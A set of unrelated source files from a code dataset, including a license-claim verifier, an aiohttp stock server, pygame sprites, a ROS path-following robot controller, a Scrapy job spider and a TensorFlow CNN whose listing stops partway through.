{"seq_id":"299292541","text":"\"\"\"Support functions for verification of embedded license claims.\"\"\"\n\n__id__ = \"$Id$\"\n__version__ = \"$Revision$\"\n__copyright__ = '(c) 2004, Creative Commons, Nathan R. Yergler'\n__license__ = 'licensed under the GNU GPL2'\n\nimport ccrdf\nimport ccrdf.rdfextract as rdfextract\n\nimport cctagutils.rdf\nimport cctagutils.exceptions  # assumed home of NotLicensedException\nfrom cctagutils.metadata import metadata\n\ndef parseClaim(claim):\n    results = {}\n\n    vtext = 'verify at '\n    vloc = claim.find(vtext)\n    if vloc != -1:\n        results['verify at'] = claim[vloc+len(vtext):].strip()\n        claim = claim[:vloc]\n\n    ltext = \"licensed to the public under \"\n    lloc = claim.lower().find(ltext)\n    if lloc != -1:\n        results['license'] = claim[lloc+len(ltext):].strip()\n        claim = claim[:lloc]\n\n    results['copyright'] = claim.strip()\n\n    return results\n\ndef lookup(filename):\n    \"\"\"Returns True or False depending on whether the embedded claim can be verified.\"\"\"\n    \n    if verify(filename) > 0:\n        return True\n    else:\n        return False\n    \ndef verify(filename):\n    \"\"\"Extracts license claim information from a file and verifies it.\n    Returns the following status codes:\n    1   Verified\n    0   No RDF\n    -1  Work information not found (possible SHA1 mismatch)\n    -2  Verification license does not match claim.\n    \"\"\"\n\n    status = 0\n    \n    claim = metadata(filename).getClaim()\n    if claim is None:\n        raise cctagutils.exceptions.NotLicensedException\n    \n    fileinfo = parseClaim(claim)\n    fileinfo['sha'] = 'urn:sha1:%s' % cctagutils.rdf.fileHash(filename)\n\n    verifyRdf = rdfextract.RdfExtractor().extractRdfText(\n        rdfextract.retrieveUrl(fileinfo['verify at'])\n        )\n\n    # check if we found any RDF at all, and update the status code\n    if len(verifyRdf) > 0:\n        status = -1\n\n    # check each block of RDF\n    # (a verification page may also have its own license RDF embedded)\n    for block in verifyRdf:\n        # parse/validate the RDF\n        verifyCc = ccrdf.ccRdf()\n        verifyCc.parse(block)\n\n        # for each work in the RDF block...\n        for work in verifyCc.works():\n            \n            # if the subject matches...\n            if work.subject == fileinfo['sha']:\n                # we found the work information;\n                # only one reason left to not verify\n                status = -2\n                \n                # we found the work, now make sure the license matches\n                for license in work.licenses():\n                    if license == fileinfo['license']:\n                        return 1\n\n    # either the file wasn't found, or the license didn't match\n    return status\n","sub_path":"spotlight/Source/cctagutils/lookup.py","file_name":"lookup.py","file_ext":"py","file_size_in_byte":2618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"185838878","text":"from Problem3 import mcdm\r\nfrom Problem3.graphrank import *\r\nimport requests\r\n\r\n# {'id': 1, 'distanceCityLink': 73.15100000000001, 'distancePosLaju': 39.28, 'distanceGdex': 76.682, 'distanceJnT': 66.071, 'distanceDHL': 58.685, 'shortestDistance': 
'Pos Laju', 'distanceShortest': 39.28, 'customer': 1}\r\n\r\ndef dist_adapter(resp):\r\n    if resp.status_code != 200:\r\n        print(\"Distance request failed; falling back to default distances\")\r\n        return None\r\n    raw = resp.json()\r\n    return {'City-Link Express': raw['distanceCityLink'], 'DHL': raw['distanceDHL'], 'GDEX': raw['distanceGdex'], 'J&T': raw['distanceJnT'], 'Pos Laju': raw['distancePosLaju']}\r\n\r\ndef prob3():\r\n    r = requests.get('http://algoprojq1.herokuapp.com/api/distance/1')\r\n    distance = dist_adapter(r) or {'City-Link Express': 30, 'DHL': 80, 'GDEX': 55, 'J&T': 63, 'Pos Laju': 70}\r\n    try:\r\n        from Problem2 import prob2\r\n        semantic = prob2(gimme_senti=True)\r\n    except Exception:\r\n        semantic = {'City-Link Express': 8.5, 'DHL': 6.4, 'GDEX': 9.3, 'J&T': 1.87, 'Pos Laju': 4.86}\r\n    \r\n    # lists from dict for mcdm\r\n    courier_company = list(semantic.keys())\r\n    distance_list = list(distance.values())\r\n    semantic_list = list(semantic.values())\r\n    # multi criteria decision making\r\n    mcdm.min_normalize(distance_list)\r\n    mcdm.max_normalize(semantic_list)\r\n    mcdm_list = mcdm.mcdm_weighted_sum(distance_list, 0.5, semantic_list, 0.5) # result\r\n    mcdm_dict = dict(zip(courier_company, mcdm_list))\r\n    print(\"multi criteria decision making result: \", mcdm_dict)\r\n    # plot graph for most to least recommended ranking\r\n    return graphrank.plot_graph_rank(mcdm_dict)\r\n","sub_path":"Problem3/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"523448772","text":"# -*- coding:utf-8 -*-\n# @Time     : 2019-08-18 11:33\n# @Author   : 胡远\n# @Github   : https://github.com/QuixoteHY\n# @Email    : 1290482442@qq.com\n# @Describe :\n\nimport asyncio\n\nfrom aiohttp import web\n\nfrom common.logger import logger\n\nfrom data_server_interface.python3.settings import SERVER_HOST, SERVER_PORT, HEARTBEAT_INTERVAL\nfrom data_server_interface.python3.controller import Controller\n\n\ndef _heartbeat(loop, interval):\n    try:\n        logger.info('heartbeat: '+str(interval)+'s')\n    except Exception as e:\n        logger.exception(e)\n    loop.call_later(interval, _heartbeat, loop, interval)\n\n\ndef start_heartbeat(loop, interval):\n    _heartbeat(loop, interval)\n\n\nclass MainHandler:\n    def __init__(self):\n        self.controller = Controller()\n\n    async def get_stock_info(self, request):\n        remote = request.remote\n        logger.info(str(remote))\n        try:\n            financial_statement_type = request.match_info.get('financial_statement_type', '')\n            ts_code = request.match_info.get('ts_code', '')\n            if not ts_code:\n                return web.json_response({'status': 'no ts_code in your request url'})\n            if financial_statement_type == 'balance_sheet':\n                self.controller.get_balance_sheet(ts_code)\n                return web.json_response({})\n            elif financial_statement_type == 'fina_indicators':\n                return web.Response(body=self.controller.get_fina_indicators(ts_code).encode('utf-8'),\n                                    content_type='text/html')\n        except Exception as e:\n            logger.exception(e)\n            return web.json_response({'status': 'error in server'})\n\n\nasync def init(loop):\n    app = web.Application(loop=loop)\n    handler = MainHandler()\n    #\n    # Fetch a listed company's balance-sheet information, e.g.\n    # http://127.0.0.1:8888/get/stock/{financial_statement_type}/{ts_code}\n    app.router.add_get('/get/stock/{financial_statement_type}/{ts_code}', handler.get_stock_info)\n    #\n    # server = await loop.create_server(app.make_handler(), SERVER_HOST, SERVER_PORT)\n    # logger.info('\\n\\tServer started at http://%s:%s...' 
% (SERVER_HOST, SERVER_PORT))\n # return server\n runner = web.AppRunner(app)\n await runner.setup()\n site = web.TCPSite(runner, SERVER_HOST, SERVER_PORT)\n logger.info('\\n\\tServer started at http://%s:%s...' % (SERVER_HOST, SERVER_PORT))\n await site.start()\n\nif __name__ == '__main__':\n _loop = asyncio.get_event_loop()\n _loop.run_until_complete(init(_loop))\n start_heartbeat(_loop, HEARTBEAT_INTERVAL)\n _loop.run_forever()\n\n","sub_path":"data_server_interface/python3/server_stock.py","file_name":"server_stock.py","file_ext":"py","file_size_in_byte":2623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"531210236","text":"import pygame, random\nimport pygame, sys\nfrom pygame.locals import *\nfrom input_mech import *\nfrom random import randint\n\t\nclass Sprite:\n def load(self, file, x, y, w, h, fx1, fy1, fx2, fy2):\n self.sIMG = pygame.image.load(file)\n self.sX = x\n self.sY = y\n self.sW = w\n self.sH = h\n self.sFX1 = fx1 * w\n self.sFY1 = fy1 * h\n self.sFX2 = fx2 * w\n self.sFY2 = fy2 * h\n self.sIMG.set_clip(pygame.Rect(self.sFX1, self.sFY1, self.sW, self.sH))\n self.sF1 = self.sIMG.subsurface(self.sIMG.get_clip())\n self.sIMG.set_clip(pygame.Rect(self.sFX2, self.sFY2, self.sW, self.sH))\n self.sF2 = self.sIMG.subsurface(self.sIMG.get_clip())\n self.sFC = self.sF1\n self.animationint = 0\n self.collisionrect = pygame.Rect(self.sX, self.sY, self.sW, self.sH)\n self.clicked = False\n self.hovered = False\n return self.sIMG, self.sX, self.sY, self.sW, self.sH, self.sFX1, self.sFY1, self.sFX2, self.sFY2, self.sF1, self.sF2, self.sFC, self.animationint, self.collisionrect, self.clicked, self.hovered\n\n def update(self, mouseDown, mouseX, mouseY):\n self.collisionrect = pygame.Rect(self.sX, self.sY, self.sW, self.sH)\n if mouseClick(mouseDown, mouseX, mouseY, self.collisionrect):\n self.clicked = True\n else:\n self.clicked = False\n if mouseHover(mouseX, mouseY, self.collisionrect):\n self.hovered = True\n else:\n self.hovered = False\n def draw(self, confirmation, ds):\n if confirmation:\n if self.animationint > 30:\n self.animationint = 0\n self.animationint += 1\n if self.animationint < 15:\n self.sFC = self.sF1\n if self.animationint >= 15:\n self.sFC = self.sF2\n ds.blit(self.sFC, (self.sX, self.sY))\n\nclass GUI_Button(Sprite):\n def lGui(self, file, x, y, w, h, fx1, fy1, fx2, fy2):\n Sprite.load(self, file, x, y, w, h, fx1, fy1, fx2, fy2)\n self.originX = x\n self.originY = y\n \n def uGui(self, mouseDown, mouseX, mouseY):\n ''' WIP: Hover Text\n black = pygame.Color(0, 0, 0)\n fontObj = pygame.font.Font('freesansbold.ttf', 12)\n self.gText = fontObj.render('This is a button', True, black)\n self.gTextRect = self.gText.get_rect()\n self.gTextRect.y = self.sY + 0.5 * self.sH\n self.gTextRect.x = self.sX + 0.5 * self.sW\n '''\n if self.clicked:\n self.sFC = self.sF2\n else:\n self.sFC = self.sF1\n \n '''if self.hovered:\n self.sX = self.originX + 10\n else:\n self.sX = self.originX'''\n \n Sprite.update(self, mouseDown, mouseX, mouseY)\n def dGui(self, ds):\n Sprite.draw(self ,False , ds)\n '''\n if self.hovered:\n ds.blit(self.gText, self.gTextRect)\n '''\n\n","sub_path":"Python Game Development/sprite_classes.py","file_name":"sprite_classes.py","file_ext":"py","file_size_in_byte":3006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"547069641","text":"import json\n\"\"\"\ndic = {}\nwith open(\"sample.json\",\"w\") as fw:\n with open(\"sample.csv\",\"r\") as 
fr:\n ls = [i.rstrip() for i in fr]\n ls = ls[0].split(\",\")+ls[1].split(\",\")\n for i in range(int(len(ls)/2)):\n dic[ls[i]] = ls[i+5]\n fw.write(str(dic))\n\"\"\"\n\nwith open(\"sample.json\",\"r\") as fr:\n header = fr.readline().strip().split(\",\")\n val = fr.readline().strip().split(\",\")\n\nd = {}\nfor i in range(len(header)):\n k = header[i]\n v = val[i]\n d[k] = v\n\nprint(d)\n","sub_path":"week_3/home_work.d/csvTojson.py","file_name":"csvTojson.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"102329610","text":"\"\"\"\nEntechts spider created on the top of ATSSpider\n\nscrapy crawl entechts -a mining_job_id=9999 -a iteration=1 -a extract=1 -a url=\"http://www.entechts.com/Jobs.aspx?Keyword=a\"\n\nSample URL:\n http://www.entechts.com/Jobs.aspx?Keyword=a\n\"\"\"\n\nfrom re import compile\nfrom scrapy.http import Request\nfrom scrapy.selector import Selector\nfrom urlparse import urljoin\n\nfrom brightcorp.base.atsspiders import ATSSpider\nfrom brightcorp.items import BrightcorpItemLoader\nfrom brightcorp.processors import Prefix, RemoveBadElements, UrlJoin\n\npattern = {\n 'count': compile(r'(\\d+)\\s*jobs\\s*match'),\n 'ref_id': compile(r'JOBID=(\\d+)'),\n}\n\n\nclass Entechts(ATSSpider):\n\n name = 'entechts'\n logo_url = ''\n\n def parse(self, response):\n sel = Selector(response)\n # set expected job count\n if not self.expected_job_count_set:\n expected_count = sel.xpath(\n '//ul/li/h3[contains(text(), \"jobs match\")]/text()'\n ).extract()\n if expected_count:\n match = pattern['count'].search(expected_count[0])\n if match:\n self.expected_job_count = expected_count[0]\n if not self.logo_url:\n self.logo_url = sel.xpath(\n '//div[@id=\"logo\"]/div/a/img/@src'\n ).extract()\n\n for div in sel.xpath(\n '//div/div[@class=\"job\"]'\n ):\n href = div.xpath(\n './div[@class=\"summary\"]/a/@href'\n ).extract()\n if href:\n yield Request(\n callback=self.parse_job_callback(),\n meta={\n 'company': div.xpath(\n './div[@class=\"client\"]/text()'\n ).extract(),\n 'location': div.xpath(\n './div[@class=\"location\"]/text()'\n ).extract(),\n 'jobcategory': div.xpath(\n './div[@class=\"sector\"]/text()'\n ).extract(),\n 'jobtype': div.xpath(\n './div[@class=\"type\"]/text()'\n ).extract(),\n 'baseSalary': div.xpath(\n './div[@class=\"rate\"]/text()'\n ).extract(),\n 'title': div.xpath(\n './div[@class=\"summary\"]/a/text()'\n ).extract(),\n },\n url=urljoin(response.url, href[0])\n )\n\n # pagination\n next_page = sel.xpath(\n '//div[contains(@class, \"pagination-btm\")]/a[@class=\"next-arrow right\"]/@href'\n ).extract()\n if next_page:\n yield Request(\n callback=self.parse,\n url=next_page[0]\n )\n\n def parse_job(self, response):\n \"\"\"\n Extract all required information.\n \"\"\"\n sel = Selector(response)\n\n loader = BrightcorpItemLoader(selector=sel)\n\n loader.add_value(\n 'title', response.meta.get('title')\n )\n loader.add_value(\n 'location', response.meta.get('location')\n )\n loader.add_value(\n 'company', response.meta.get('company')\n )\n loader.add_value(\n 'referencenumber',\n response.url,\n Prefix('%s-' % self.name),\n re=pattern['ref_id']\n )\n loader.add_value('url', response.url)\n loader.add_xpath(\n 'description',\n '//div/div[@class=\"details\"]',\n RemoveBadElements(['img', ])\n )\n loader.add_value(\n 'baseSalary', response.meta.get('baseSalary')\n )\n loader.add_value(\n 'jobtype', response.meta.get('jobtype')\n )\n loader.add_value(\n 'jobcategory', 
response.meta.get('jobcategory')\n        )\n        loader.add_value(\n            'logo_url',\n            self.logo_url,\n            UrlJoin(response.url)\n        )\n        loader.add_value('apply_url', response.url)\n\n        yield loader.load_item()\n","sub_path":"brightcorp/brightcorp/spiders/entechts.py","file_name":"entechts.py","file_ext":"py","file_size_in_byte":4182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"348935834","text":"from django.contrib import admin\nfrom .models import Question, Choice\n# Register your models here.\n\nclass ChoiceInline(admin.TabularInline):\n    model = Choice\n    extra = 3\n\nclass QuestionAdmin(admin.ModelAdmin):\n    fieldsets = [\n        ('Date Info', {'fields': ['published_on']}),\n        (None, {'fields': ['body']}),\n    ]\n    inlines = [ChoiceInline]\n\nadmin.site.register(Question, QuestionAdmin)\n","sub_path":"app/polls/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"77437371","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport glob\nimport os\n\nimport markdown\n\nfrom scriptlib import config, const\n\n\ndef read_file(filename):\n    with open(filename) as fh:\n        return fh.read().decode(\"utf-8\")\n\n\ndef write_file(filename, data):\n    with open(filename, \"w\") as fh:\n        fh.write(data)\n\n\ndef scan_dir(path):\n    markdowns = []\n    for filename in glob.glob(\"%s/*.md\" % path):\n        markdowns.append(read_file(filename))\n    return markdowns\n\n\ndef build_chapter(path):\n    chapter = []\n    if os.path.isfile(path):\n        chapter.append(read_file(path))\n    elif os.path.isdir(path):\n        chapter.extend(scan_dir(path))\n    return chapter\n\n\ndef filter_front_matter(chapter):\n    \"\"\"\n    Scan each chapter for Jekyll annotations at the beginning of each section\n    and remove them.\n    \"\"\"\n    sections = []\n    for section in chapter:\n        counts = 0\n        start = None\n        lines = section.splitlines()\n        for index, line in enumerate(lines):\n            if counts == 2:\n                start = index\n                break\n            if line == const.delimiter:\n                counts += 1\n        sections.append(\"\\n\".join(lines[start:]))\n    return sections\n\n\ndef is_heading(key):\n    if (key.startswith(\"#\") and\n            not key.startswith(\"#B(\") and\n            not key.startswith(\"#b(\") and\n            not key.startswith(\"#(\") and\n            not key.startswith(\"#Fun\")):\n        return True\n    return False\n\n\ndef get_anchor_name(heading):\n    return heading.replace(\n        '#', '').strip().replace(\n        '.', '').replace(\n        ' ', '_').replace(\n        \"'\", '').replace(\n        '`', '').lower()\n\n\ndef get_anchor(heading):\n    # HTML anchor target for the heading\n    return '<a name=\"%s\"></a>' % get_anchor_name(heading)\n\n\ndef is_seen(key, seen):\n    if seen.intersection([key]):\n        return True\n    return False\n\n\ndef remove_extra_headings(chapter, headings_only=False, include_anchors=True,\n                          as_string=True):\n    \"\"\"\n    Several chapters have their headings listed more than once (due to multiple\n    markdown docs). 
This function removes all but the first one.\n \"\"\"\n sections = []\n seen = set()\n for section in chapter:\n filtered_section = []\n for line in section.splitlines():\n key = line.strip()\n if is_heading(key):\n if not is_seen(key, seen):\n if include_anchors:\n filtered_section.append(get_anchor(line))\n filtered_section.append(line)\n seen.add(key)\n elif not headings_only:\n filtered_section.append(line)\n if as_string:\n sections.append(\"\\n\".join(filtered_section))\n else:\n sections.extend(filtered_section)\n return sections\n\n\ndef assemble_headings(book_config):\n headings = []\n for chapter_location in book_config.chapters:\n chapter = build_chapter(chapter_location)\n headings.extend(\n remove_extra_headings(\n chapter, headings_only=True, include_anchors=False,\n as_string=False))\n return headings\n\n\ndef assemble_chapters(book_config, remove_front_matter=True):\n chapters = []\n for chapter_location in book_config.chapters:\n chapter = build_chapter(chapter_location)\n if remove_front_matter:\n chapter = filter_front_matter(chapter)\n chapter = remove_extra_headings(chapter)\n chapters.extend(chapter)\n return chapters\n\n\ndef assemble_book(book_config, remove_front_matter=True):\n chapters = [const.delimiter,\n \"layout: book\",\n \"title: %s\" % book_config.title,\n \"author: %s\" % \", \".join(book_config.authors),\n const.delimiter] + assemble_chapters(\n book_config, remove_front_matter)\n book = \"\\n\".join(chapters)\n return book.encode(\"utf-8\")\n\n\ndef generate_doc(book_config):\n markdown_data = assemble_book(book_config)\n write_file(book_config.md_file, markdown_data)\n\n\ndef generate_docs():\n for book_config in config.docs:\n generate_doc(book_config)\n","sub_path":"docs/v0.8/scriptlib/md.py","file_name":"md.py","file_ext":"py","file_size_in_byte":4119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"275817611","text":"#!/usr/bin/env python\n\n\"\"\"\non any new /initialpose, do full rotation, then delay (to hone in amcl)\n\nfollow something ~15th pose in global path for all moves (about 0.3m away?)\n -maximum path length seems to be about 35*5 (45*5 max) for 2-3 meter path\n -(longer if more turns -- go for 15th or 20th pose, or max if less, should be OK)\n\nignore local path, except for determining if at goal or not\n\tif no recent local path, must be at goal: followpath = False, goalpose = true\n\nrequires dwa_base_controller, global path updated continuously as bot moves\n\n\"\"\"\n\n\nimport rospy, tf\nimport oculusprimesocket\nfrom nav_msgs.msg import Odometry\nimport math\nfrom nav_msgs.msg import Path\nfrom geometry_msgs.msg import PoseWithCovarianceStamped\nfrom actionlib_msgs.msg import GoalStatusArray\nfrom move_base_msgs.msg import MoveBaseActionGoal\n\nlistentime = 0.6 # 0.6 # allows odom + amcl to catch up\nnextmove = 0\nodomx = 0\nodomy = 0\nodomth = 0\ntargetx = 0\t\ntargety = 0\ntargetth = 0\nfollowpath = False\npathid = None\ngoalth = 0 \ninitialturn = False\nwaitonaboutface = 0\nminturn = math.radians(8) # (was 6) -- 0.21 minimum for pwm 255\nminlinear = 0.08 # was 0.05\nmaxlinear = 0.5\nlastpath = 0 # refers to localpath\ngoalpose = False\ngoalseek = False\nmeterspersec = 0.33 # linear speed TODO: get from java\ndegperms = 0.0857 # turnspeed TODO: get from java\ntfth = 0\nglobalpathposenum = 20 # just right\nlistener = None\n\n\ndef pathCallback(data): # local path\n\tglobal goalpose, lastpath\n\t\n\tlastpath = rospy.get_time()\n\tgoalpose = False\n\t\ndef 
globalPathCallback(data):\n\tglobal targetx, targety, targetth , followpath, pathid\n\t\n\tn = len(data.poses)\n\tif n < 5:\n\t\treturn\n\t\t\n\tif n-1 < globalpathposenum:\n\t\tp = data.poses[n-1] \n\telse:\n\t\tp = data.poses[globalpathposenum]\n\t\n\ttargetx = p.pose.position.x\n\ttargety = p.pose.position.y\n\tquaternion = ( p.pose.orientation.x, p.pose.orientation.y,\n\tp.pose.orientation.z, p.pose.orientation.w )\n\ttargetth = tf.transformations.euler_from_quaternion(quaternion)[2]\n\t\n\tfollowpath = True\n\tpathid = data.header.seq\n\ndef odomCallback(data):\n\tglobal odomx, odomy, odomth\n\todomx = data.pose.pose.position.x\n\todomy = data.pose.pose.position.y\n\tquaternion = ( data.pose.pose.orientation.x, data.pose.pose.orientation.y,\n\tdata.pose.pose.orientation.z, data.pose.pose.orientation.w )\n\todomth = tf.transformations.euler_from_quaternion(quaternion)[2]\n\t\n\t# determine direction (angle) on map\n\tglobal tfth, listener\t \n\ttry:\n\t\t(trans,rot) = listener.lookupTransform('/map', '/odom', rospy.Time(0))\n\t\tquaternion = (rot[0], rot[1], rot[2], rot[3])\n\t\ttfth = tf.transformations.euler_from_quaternion(quaternion)[2]\n\texcept (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException):\n\t\tpass\t\n\ndef intialPoseCallback(data):\n\tif data.pose.pose.position.x == 0 and data.pose.pose.position.y == 0:\n\t\treturn\n\t# do full rotation on pose estimate, to hone-in amcl (if not docked)\n\trospy.sleep(0.5) # let amcl settle\n\toculusprimesocket.clearIncoming() # why?\n\toculusprimesocket.sendString(\"right 360\")\n\toculusprimesocket.waitForReplySearch(\" direction stop\")\n\n\t\ndef goalCallback(d):\n\tglobal goalth, goalpose, lastpath, initialturn, followpath, nextmove\n\n\t# to prevent immediately rotating wrongly towards new goal direction \n\tlastpath = rospy.get_time()\n\tgoalpose = False\n\n\t# set goal angle\n\tdata = d.goal.target_pose\n\tquaternion = ( data.pose.orientation.x, data.pose.orientation.y,\n\tdata.pose.orientation.z, data.pose.orientation.w )\n\tgoalth = tf.transformations.euler_from_quaternion(quaternion)[2]\n\tinitialturn = True\n\tfollowpath = False\n\tnextmove = lastpath + 2 # sometimes globalpath still points at previoius goal\n\t\ndef goalStatusCallback(data):\n\tglobal goalseek\n\tgoalseek = False\n\tif len(data.status_list) == 0:\n\t\treturn\n\tstatus = data.status_list[len(data.status_list)-1] # get latest status\n\tif status.status == 1:\n\t\tgoalseek = True\n\ndef move(ox, oy, oth, tx, ty, tth, gth):\n\tglobal followpath, goalpose, tfth, pathid, initialturn, waitonaboutface\n\tglobal odomx, odomy, odomth\n\n\tcurrentpathid = pathid\n\n\t# determine xy deltas for move\n\tdistance = 0\n\tif followpath:\n\t\tdx = tx - ox\n\t\tdy = ty - oy\t\n\t\tdistance = math.sqrt( pow(dx,2) + pow(dy,2) )\n\t\n\tgoalrotate = False\n\tif distance > 0:\n\t\tth = math.acos(dx/distance)\n\t\tif dy <0:\n\t\t\tth = -th\n\telif goalpose:\n\t\tth = gth - tfth\n\t\tgoalrotate = True\n\telse:\n\t\tth = tth\n\t\n\t# determine angle delta for move\n\tdth = th - oth\n\tif dth > math.pi:\n\t\tdth = -math.pi*2 + dth\n\telif dth < -math.pi:\n\t\tdth = math.pi*2 + dth\n\t\t\n\t# force minimums\t\n\tif distance > 0 and distance < minlinear:\n\t\tdistance = minlinear\n\t\t\n\tif distance > maxlinear:\n\t\tdistance = maxlinear\n\n\t# supposed to reduce zig zagging (was 0.3)\n\tif dth < minturn*0.5 and dth > -minturn*0.5:\n\t\tdth = 0\n\telif dth >= minturn*0.5 and dth < minturn:\n\t\tdth = minturn\n\telif dth <= -minturn*0.5 and dth > -minturn:\n\t\tdth = 
-minturn\n\n\toculusprimesocket.clearIncoming()\n\n\t# if turning more than 120 deg, inch forward, make sure not transient obstacle (like door transfer)\n\tif abs(dth) > 2.0944 and not goalrotate and not initialturn and waitonaboutface < 1: \n\t\toculusprimesocket.sendString(\"forward 0.25\")\n\t\toculusprimesocket.waitForReplySearch(\" direction stop\")\n\t\twaitonaboutface += 1 # only do this once\n\t\trospy.sleep(1)\n\t\treturn\n\t\t\n\twaitonaboutface = 0\n\n\tif not pathid == currentpathid:\n\t\treturn\n\n\tif dth > 0:\n\t\toculusprimesocket.sendString(\"left \" + str(int(math.degrees(dth))) ) \n\t\toculusprimesocket.waitForReplySearch(\" direction stop\")\n\telif dth < 0:\n\t\toculusprimesocket.sendString(\"right \" +str(int(math.degrees(-dth))) )\n\t\toculusprimesocket.waitForReplySearch(\" direction stop\")\n\n\tif distance > 0:\n\t\toculusprimesocket.sendString(\"forward \"+str(distance))\n\t\trospy.sleep(distance/meterspersec)\n\t\tinitialturn = False\n\n\t# if goalrotate:\n\t\t# rospy.sleep(1) \n\t\t\n\t\t\t\ndef cleanup():\n\t# oculusprimesocket.sendString(\"move stop\")\n\t# oculusprimesocket.sendString(\"state delete navigationenabled\")\n\toculusprimesocket.sendString(\"log global_path_follower.py disconnecting\") \n\n\n# MAIN\n\n# rospy.init_node('dwa_base_controller', anonymous=False)\nrospy.init_node('global_path_follower', anonymous=False)\nlistener = tf.TransformListener()\noculusprimesocket.connect()\nrospy.on_shutdown(cleanup)\n\nrospy.Subscriber(\"odom\", Odometry, odomCallback)\nrospy.Subscriber(\"move_base/DWAPlannerROS/local_plan\", Path, pathCallback)\nrospy.Subscriber(\"move_base/goal\", MoveBaseActionGoal, goalCallback)\nrospy.Subscriber(\"move_base/status\", GoalStatusArray, goalStatusCallback)\nrospy.Subscriber(\"move_base/DWAPlannerROS/global_plan\", Path, globalPathCallback)\nrospy.Subscriber(\"initialpose\", PoseWithCovarianceStamped, intialPoseCallback)\n\noculusprimesocket.sendString(\"log global_path_follower.py connected\") \n# oculusprimesocket.sendString(\"state odomturndpms \"+str(degperms)) # degrees per ms \n# oculusprimesocket.sendString(\"state odomturnpwm 100\") # approx starting point smooth floor\n# oculusprimesocket.sendString(\"state odomlinearmpms \"+str(meterspersec/1000)) \n# oculusprimesocket.sendString(\"state odomlinearpwm 150\") # approx starting point\n\n# oculusprimesocket.sendString(\"speed \"+str(linearspeed) )\n\nwhile not rospy.is_shutdown():\n\tt = rospy.get_time()\n\t\n\tif t >= nextmove:\n\t\t# nextmove = t + listentime\n\t\tif goalseek and (followpath or goalpose): \n\t\t\tmove(odomx, odomy, odomth, targetx, targety, targetth, goalth) # blocking\n\t\t\tnextmove = rospy.get_time() + listentime\n\t\t\tfollowpath = False\n\t\n\tif t - lastpath > 3:\n\t\tgoalpose = True\n\t\n\trospy.sleep(0.01)\n\t\n","sub_path":"src/global_path_follower.py","file_name":"global_path_follower.py","file_ext":"py","file_size_in_byte":7481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"314010037","text":"import tensorflow as tf\n\nclass SignalCNN(object):\n # A CNN for signal regression.\n\n def __init__(self, signal_length, num_outputs, filter_sizes, num_filters):\n\n # Placeholders for input, output and dropout\n self.input_x = tf.placeholder(tf.float32, [None, 2, signal_length, 1], name=\"input_x\")\n self.input_y = tf.placeholder(tf.float32, [None, num_outputs], name=\"input_y\")\n self.dropout_keep_prob = tf.placeholder(tf.float32, name=\"dropout_keep_prob\")\n\n pooled_outputs = []\n\n 
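# One branch per filter size: conv -> pool -> conv -> pool -> flatten.\n        # As a sketch, with input [batch, 2, L, 1], L = signal_length and\n        # filter size k: conv1 [2, k] collapses the two-row axis and leaves\n        # width L-k+1; each [1, 2] stride-1 max-pool trims one step and\n        # conv2 [1, k] trims k-1 more, so every branch flattens to\n        # num_filters * (L - 2k) features before the branches are concatenated.\n        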
for i, filter_size in enumerate (filter_sizes):\n with tf.name_scope(\"conv-maxpool-%s\" % filter_size):\n # Convolutional Layer\n conv1 = tf.layers.conv2d (\n inputs=self.input_x,\n filters=num_filters,\n kernel_size=[2, filter_size],\n padding='VALID',\n activation=tf.nn.relu)\n print ('conv1', conv1)\n\n # pool_size = tf.int32(filter_size/2)\n # Max-pooling over the outputs\n pooled1 = tf.layers.max_pooling2d(\n inputs=conv1,\n pool_size=[1, 2],\n strides=[1, 1],\n padding='VALID')\n pooled1 = tf.nn.dropout(pooled1, self.dropout_keep_prob)\n print ('pool1', pooled1)\n\n # Convolutional Layer\n conv2 = tf.layers.conv2d (\n inputs=pooled1,\n filters=num_filters,\n kernel_size=[1, filter_size],\n padding='VALID',\n activation=tf.nn.relu)\n print ('conv2', conv2)\n\n # Max-pooling over the outputs\n pooled2 = tf.layers.max_pooling2d(\n inputs=conv2,\n pool_size=[1, 2],\n strides=[1, 1],\n padding='VALID')\n pooled2 = tf.nn.dropout(pooled2, self.dropout_keep_prob)\n print ('pool2', pooled2)\n\n pooled2 = tf.contrib.layers.flatten(pooled2)\n pooled_outputs.append(pooled2)\n\n # Combine all the pooled features\n self.h_pool_flat = tf.concat(pooled_outputs, 1)\n print ('h_pool_flat', self.h_pool_flat)\n self.h_drop = tf.nn.dropout(self.h_pool_flat, self.dropout_keep_prob)\n \n with tf.name_scope(\"fully_connected_layer1\"):\n self.fclayer1 = tf.contrib.layers.fully_connected(self.h_drop, 8192, activation_fn=tf.nn.relu)\n self.h_drop1 = tf.nn.dropout(self.fclayer1, self.dropout_keep_prob)\n\n with tf.name_scope(\"fully_connected_layer2\"):\n self.fclayer2 = tf.contrib.layers.fully_connected(self.h_drop1, 4096, activation_fn=tf.nn.relu)\n self.h_drop2 = tf.nn.dropout(self.fclayer2, self.dropout_keep_prob)\n\n with tf.name_scope(\"fully_connected_layer3\"):\n self.fclayer3 = tf.contrib.layers.fully_connected(self.h_drop2, 2048, activation_fn=tf.nn.relu)\n self.h_drop3 = tf.nn.dropout(self.fclayer3, self.dropout_keep_prob)\n\n with tf.name_scope(\"fully_connected_layer4\"):\n self.fclayer4 = tf.contrib.layers.fully_connected(self.h_drop3, 1024, activation_fn=tf.nn.relu)\n self.h_drop4 = tf.nn.dropout(self.fclayer4, self.dropout_keep_prob)\n\n #with tf.name_scope(\"fully_connected_layer5\"):\n # 